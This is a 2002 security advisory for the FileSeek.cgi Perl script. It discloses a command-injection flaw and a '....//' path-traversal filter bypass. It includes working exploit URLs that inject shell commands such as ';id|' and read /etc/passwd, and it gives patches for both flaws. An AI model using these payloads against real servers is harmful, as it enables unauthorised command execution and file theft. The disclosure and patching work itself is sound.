Best to read is the online version: http://www.dsinet.org/textfiles/advisories/FileSeek-advisory.txt ------------------------------ FileSeek cgi script Advisory ------------------------------ FileSeek.cgi / FileSeek2.cgi 16/04/2002 - by Thijs Bosschert (nighthawkat_private) ------------------- Vendor Information: ------------------- Homepage : http://www.cgi-perl.com Written by : Craig Patchett Vendor informed About bug : Months ago Mailed advisory: 14/04/02 Vender Response : None yet Version on site : Still vulnerable ------------------- Description: ------------------- FileSeek is a cgi-script from "The CGI/Perl Cookbook from John Wiley & Sons". The script is written by Craig Patchett. It is being used to find and download files on a server. ------------------- Affected Versions: ------------------- All ------------------- Vulnerability: ------------------- There are 2 vulnerabilities in the script. The first is that the script doesn't filter escape characters to execute commands. This flaw has been found also by another group, the advisory of that can be found on: http://www.russiahack.com/advisories/adviseries112.txt The second vulnerability is a directory transversal bug which let you read any file on the server. This because of the script filtering "../" out of the request, which can be bypassed if the request uses "....//" which after filtering "../" out of it leaves "../" . ------------------- Exploit: ------------------- Command execution vulnerability: http://host/cgi-bin/FileSeek.cgi?head=&foot=;id| http://host/cgi-bin/FileSeek.cgi?head=;id|&foot= http://host/cgi-bin/FileSeek.cgi?head=&foot=|id| http://host/cgi-bin/FileSeek.cgi?head=|id|&foot= Directory transversal vulnerability: http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//.... //....//....//etc/passwd http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//.... //....//etc/passwd&foot= ------------------- Patch: ------------------- Patch for Command execution vulnerability: Add below the "Generate HTML page" part the following code: ######################################################################## #### # Generate the HTML page # ######################################################################## #### $ARGS{'head'} =~ tr/\|\;/XX/; $ARGS{'foot'} =~ tr/\|\;/XX/; This will make the request bogus if it contains a ; or |, so that it will result in an error. Patch for Directory transversal vulnerability: Change the following Part: # Make sure they're not trying to access an invalid directory if ($directory =~ /$DD\.\./) { $directory = '' } $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g; $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g; Into: # Make sure they're not trying to access an invalid directory if ($directory =~ /$DD\.\./) { $directory = '' } $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g; $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g; This will make it filter on ".." and not on "../" -------------------
This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 18:32:42 PDT